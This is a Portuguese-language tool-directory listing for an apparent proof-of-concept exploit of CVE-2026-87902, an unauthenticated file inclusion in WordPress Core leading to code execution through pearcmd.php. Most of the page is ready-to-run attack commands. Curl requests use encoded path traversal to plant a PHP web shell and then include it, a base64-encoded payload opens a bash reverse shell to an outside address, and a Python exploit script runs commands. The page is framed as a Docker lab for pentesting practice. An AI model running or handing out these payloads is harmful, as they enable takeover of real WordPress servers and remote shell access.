Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
wordpress-cve-2026-87902 — Proof-of-concept de exploit para CVE-2026-87902, uma LFI não autenticada no WordPress Core que leva a RCE via pearcmd.php, com um laboratório Docker e scripts de exploit em curl/Python. | Kitploit
Ferramentas/GitHubGitHub/nextco/wordpress-cve-2026-87902
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoLabs e Prática
GitHubnextco/wordpress-cve-2026-87902

wordpress-cve-2026-87902

Proof-of-concept de exploit para CVE-2026-87902, uma LFI não autenticada no WordPress Core que leva a RCE via pearcmd.php, com um laboratório Docker e scripts de exploit em curl/Python.

Ver Repositório
1há 14h 45mAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-87902 — LFI Condicional

WordPress Core <= 7.1.1 — LFI não autenticado (carregador de template pagename) → RCE via pearcmd.php.

Créditos: https://github.com/ressl/cve-2026-87902-poc

Executar laboratório

root@kitploit:~
cd docker && docker compose up -d

Exploit — curl

root@kitploit:~
curl "http://127.0.0.1:18092/?page_id=2&pagename=templates%252F%252e%252e%252F%252e%252e%252F%252e%252e%252F%252e%252e%252F%252e%252e%252F%252e%252e%252F%252e%252e%252Fusr%252Flocal%252Flib%252Fphp%252Fpearcmd&+config-create+/&<?=stripslashes($_REQUEST[_])?>+"
curl "http://127.0.0.1:18092/?page_id=2&pagename=templates%252F%252e%252e%252F%252e%252e%252F%252e%252e%252F%252e%252e%252F%252e%252e%252F%252e%252e%252F%252e%252e%252Ftmp%252Fpwn"
# Reverse Shell
curl "http://127.0.0.1:18092/?page_id=2&pagename=templates%252F%252e%252e%252F%252e%252e%252F%252e%252e%252F%252e%252e%252F%252e%252e%252F%252e%252e%252F%252e%252e%252Ftmp%252Fpwn&_=echo+L2Jpbi9iYXNoIC1jICcvYmluL2Jhc2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xLjM3LzQ0MyAwPiYxJw==|base64+-d|sh"

Exploit — python

root@kitploit:~
python3 exploit-pear.py http://127.0.0.1:18092 2 "id"
Baixar ferramenta